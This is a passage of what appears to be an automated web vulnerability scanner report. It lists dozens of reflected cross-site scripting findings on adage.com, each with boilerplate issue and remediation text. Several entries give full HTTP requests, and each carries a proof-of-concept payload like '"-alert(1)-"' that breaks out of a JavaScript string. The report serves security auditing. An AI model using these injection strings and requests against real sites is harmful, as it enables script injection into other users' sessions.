Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad281"-alert(1)-"f7a28624ad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66b7c"-alert(1)-"2189b33e4aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22daa"-alert(1)-"f28d957d2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8f5b"-alert(1)-"4ba0874f211 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22b07"-alert(1)-"e0fa823c0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96793"-alert(1)-"a394d944e1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fd01"-alert(1)-"cbc44a735e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7b7"-alert(1)-"366d2d0d6da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cb7"-alert(1)-"a81db8a7c00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the article_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a47d"-alert(1)-"9cc0d874d9c was submitted in the article_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//CONFIGURATION VARIABLES hbx.acct = "DM530303F9CM83EN3"; hbx.pn = "get_comments.php?article_id=2295253a47d"-alert(1)-"9cc0d874d9c";//THIS IS THE UNIQUE PAGE IDENTIFIER hbx.mlc = "adage.com/ajax/get_comments.php"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER hbx.pndef = "title"; hbx.ctdef = "full";
//OPTIONAL PAGE VARIABLES / ...[SNIP]...
1.64. http://adage.com/ajax/get_comments.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adage.com
Path:
/ajax/get_comments.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef573"-alert(1)-"863d9e39407 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8361"-alert(1)-"1042b2e5d11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articled8361"-alert(1)-"1042b2e5d11/digital/doubleverify-33m-funding/229525/ HTTP/1.1 Host: adage.com Proxy-Connection: keep-alive Referer: http://www.doubleverify.com/resources/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddfeb"-alert(1)-"304ed33505d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/digital/doubleverify-33m-funding/229525ddfeb"-alert(1)-"304ed33505d/ HTTP/1.1 Host: adage.com Proxy-Connection: keep-alive Referer: http://www.doubleverify.com/resources/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.67. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adage.com
Path:
/article/digital/doubleverify-33m-funding/229525/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d08c6"-alert(1)-"fa56ecc0080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/digital/doubleverify-33m-funding/229525/?d08c6"-alert(1)-"fa56ecc0080=1 HTTP/1.1 Host: adage.com Proxy-Connection: keep-alive Referer: http://www.doubleverify.com/resources/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>DoubleVerify Gets Another $33M in Funding | Digital - A ...[SNIP]... bEC++]=new Object();b._N=a;b._C=0;return b;} var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";
//CONFIGURATION VARIABLES hbx.acct = "DM530303F9CM83EN3"; hbx.pn = "article.php?d08c6"-alert(1)-"fa56ecc0080=1";//THIS IS THE UNIQUE PAGE IDENTIFIER hbx.mlc = "adage.com/article/digital/doubleverify-33m-funding/229525/"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER hbx.pndef = "title"; hbx.ctdef = "full";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f52"-alert(1)-"5ae0a33a27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1369"-alert(1)-"9ba2570b3e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14808"-alert(1)-"d35674d75f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico14808"-alert(1)-"d35674d75f9 HTTP/1.1 Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/) Host: adage.com Proxy-Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc155"-alert(1)-"1fcd7946afc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4003f"-alert(1)-"5cfe03c22a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6f08"-alert(1)-"e00607392d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54ca4"-alert(1)-"9aba41bab09 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7715a"-alert(1)-"74b81daadd4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"da314f30353 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c816"-alert(1)-"25cc12a59a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f7d1"-alert(1)-"0f37756a12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fff7"-alert(1)-"3fade222f3c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18340"-alert(1)-"32365ab770 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6af"-alert(1)-"fce269f3ba2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91819"-alert(1)-"1f8001d74a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f67"-alert(1)-"555f3d15fb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c6d7"-alert(1)-"f252829a817 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd32d"-alert(1)-"b0f2a928db4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed158"-alert(1)-"e8877cf2e51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad82f"-alert(1)-"f3588c172fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54949"-alert(1)-"b7bdff866a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8074b"-alert(1)-"f96571d605a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e00f"-alert(1)-"2dd77db2802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92490"-alert(1)-"9e6d89302a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90b09"-alert(1)-"61f3cf5a7b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f93be"-alert(1)-"85b419b749b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9ad"-alert(1)-"16da5250f4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e969"-alert(1)-"260bf1a16d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3352"-alert(1)-"c3b712d34b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae52"-alert(1)-"a2d3540830b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 253e4"-alert(1)-"8f75231b492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31ca1"-alert(1)-"e9fec1e377d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9b"-alert(1)-"ea04503a836 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1bba"-alert(1)-"239b8dd9444 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aa85"-alert(1)-"2668855e0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f53d"-alert(1)-"6b94a11373c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e821e"-alert(1)-"79ddf212f2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 858b7"-alert(1)-"bb05cec5b1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b52f8"-alert(1)-"3572e8d3978 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0678"-alert(1)-"3f00723c72b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50e14"-alert(1)-"8f6132336dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a321c"-alert(1)-"985e8bfe21e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90478"-alert(1)-"a4ab2d20d6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19038"-alert(1)-"34eeeccf4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a93ec"-alert(1)-"3555ffd6f45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57db"-alert(1)-"c134cc6d981 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad090"-alert(1)-"48344422a62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7ad5"-alert(1)-"ee21b03fa02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab5f6"-alert(1)-"516e97c6620 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2163d"-alert(1)-"47f41d3c23a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4392"-alert(1)-"ecfac324a76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
